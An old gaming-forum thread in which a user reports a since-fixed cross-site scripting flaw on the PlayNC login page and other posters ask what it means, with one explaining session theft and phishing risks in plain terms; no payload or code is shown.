PlayNC XSS proof of concept

https://secure.plaync.com/cgi-bin/plaync_login.pl

That's kinda stupid the only serious XSS flaw I found on their site was right on the login page.
Gogo fix it!

Knew this for a while but I figured I'd post because I saw this thread http://www.guildwarsguru.com/forum/s...php?t=10047808.

Btw don't be ashamed plaync... blizzard got the same problem on their e-card site and it still hasn't been fixed even though I reported it like a year ago. =)

Edit: Fixed first link to work for most browsers.

Edit2: Yay it's fixed!

What? What? What?

Click the linky

Did that, one leads me to this thread and the other to the PlayNC login. So what should I see there?

point??? dont know whats goin on.....

I only tested it on firefox, you are probably using IE? Sec lemme fix the link to work for IE too.

Opera 9.26

Probably using IE? Should I feel insulted?
12 chars

Ok, edited the first link to work for most browsers.

The only thing I see that's weird on the first is the series is %20 (spaces) and some other %## I don't remember ATM...

The other link goes right back at this thread.

Can you explain the whole problem though? Is it a security flaw or something?

EDIT: clicked on the link above... wtf... O_o;;...

EDIT2: Using FireFox ATM.

<-- Noob,
What's going on ? ^^

Im still wondering myself.
used firefox,still clueless.....



Is this what your pointing too????

In short, pablo24 found yet another exploit in PlayNC/Guild Wars that PlayNC/Arena Net can't be arsed to fix.

The security flaw is that their script will echo the html/javascript directly into your browser.

With this, a malicious user could steal a session from a user, or, as in the first example, redirect the unsuspecting user to another webpage in the context of the plaync website (phishing)

Why? Because sadly even web developers these days fail to understand the severity of such an attack.

Thanks for giving me an explanation I can actually understand

Could that be where the possible hacker got his info from? Regarding the hacked accounts thread thingy... I say it's possible >_>.

Thanks that worked!

the normal site is secured and the fake not.
but yeah someone could use that to steal login and pass....ironic no?

Less geek, more street?

With some tweaking the modified site would be secure too.

Actually if I understood correctly, the REAL site (the https: / / ) one IS flawed... flawed so much someone can redirect to that object that totally creeped me out (wasn't expecting it at all and my speakers were loud x];;; )

But I could be wrong. I'm no expert.

if this is an expolit you should prolly report it to them and not advertise it here